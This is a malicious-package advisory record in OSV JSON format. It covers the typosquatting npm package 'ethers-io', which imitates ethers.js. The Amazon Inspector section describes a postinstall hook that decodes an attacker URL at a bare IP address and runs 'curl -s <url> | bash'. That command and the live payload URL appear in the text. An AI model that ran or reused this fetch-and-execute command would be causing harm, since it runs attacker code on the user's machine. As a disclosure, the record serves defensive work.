{"id":"MAL-2026-3708","summary":"Malicious code in ethers-io (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14)\nThe package's `package.json` declares a `postinstall` script that base64-decodes a hidden URL (`http://8.217.75.147:3000/payload`) and pipes the HTTP response directly to `bash` via `curl -s \u003curl\u003e | bash`. On every `npm install`, arbitrary attacker-controlled shell code is fetched over plain HTTP from a bare IPv4 address and executed on the installer's machine with no TLS, no integrity verification, and fully mutable content. Multiple independent block signals stack: obfuscated URL in a lifecycle hook, curl-pipe-bash, bare-IP plaintext C2, and purpose mismatch with the package's stated function. The package name `ethers-io` and its stated purpose as \"I/O utilities for ethers.js\" additionally impersonate the well-known ethers.js ecosystem, with the repository pointing at `github.com/ethers-utils/ethers-io` rather than the genuine ethers.js organization — a typosquat lure wrapped around the install-time RCE.\n\n## Source: ossf-package-analysis (096fee7452967418fa149986d5ef661f3292d844524b58d3c3ca2b2e1b8cffc0)\nThe OpenSSF Package Analysis project identified 'ethers-io' @ 2.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-15T07:51:34.899337Z","published":"2026-05-13T12:01:08Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-05-13T12:01:08Z","versions":["2.0.0"],"source":"ossf-package-analysis","sha256":"096fee7452967418fa149986d5ef661f3292d844524b58d3c3ca2b2e1b8cffc0","import_time":"2026-05-13T21:58:24.739660541Z"},{"modified_time":"2026-05-13T12:01:28Z","versions":["1.0.0"],"source":"ossf-package-analysis","sha256":"53670603313bd7a44e508b5eae7a10e2aa77aff4ebe93bb7f37cfa14ffac16e4","import_time":"2026-05-13T21:58:24.632215328Z"},{"modified_time":"2026-05-14T19:25:08Z","versions":["2.0.0"],"id":"IN-MAL-2026-002691","source":"amazon-inspector","sha256":"098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14","import_time":"2026-05-15T07:37:16.778530994Z"},{"modified_time":"2026-05-15T03:16:46Z","versions":["2.0.0"],"id":"IN-MAL-2026-002815","source":"amazon-inspector","sha256":"374ad9e5565581a12e9a891c5fffd853d7d6f548261693d05d2fe40a15001ef4","import_time":"2026-05-15T07:37:20.673900921Z"},{"modified_time":"2026-05-14T19:25:07Z","versions":["1.0.0"],"id":"IN-MAL-2026-002690","source":"amazon-inspector","sha256":"5c9fe094b4d627b53e4f88fb92a2fbee76337088f6f615c7fdc6ebe95a268a34","import_time":"2026-05-15T07:37:16.723479836Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ethers-io/v/2.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ethers-io/v/1.0.0"}],"affected":[{"package":{"name":"ethers-io","ecosystem":"npm","purl":"pkg:npm/ethers-io"},"versions":["2.0.0","1.0.0"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-VnyifUoRFKdpM31skgnvV3Q+BJ99rXEO4Ht2et3LGITpbS3fK4gLsyT33JBmJHMH1STGbCO9GzexGOvDXFhBxQ==","sha1":"a5c87e94ece6c12d7f1fe1e1e5d89a4e736bcd7f"},"filename":"ethers-io-2.0.0.tgz"}],"evidence_files":[{"sha256":"0b6caae1378a89a996fe7e1620494a2475bce12bcdfb8848d6ca9e7ecdc3ef72","path":"package.json","tlsh":"18016651d9242aa32acc1fd46d4e208ab2365c0b5c54bc24b397880e4b5e2ef02fb68d"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-io/MAL-2026-3708.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}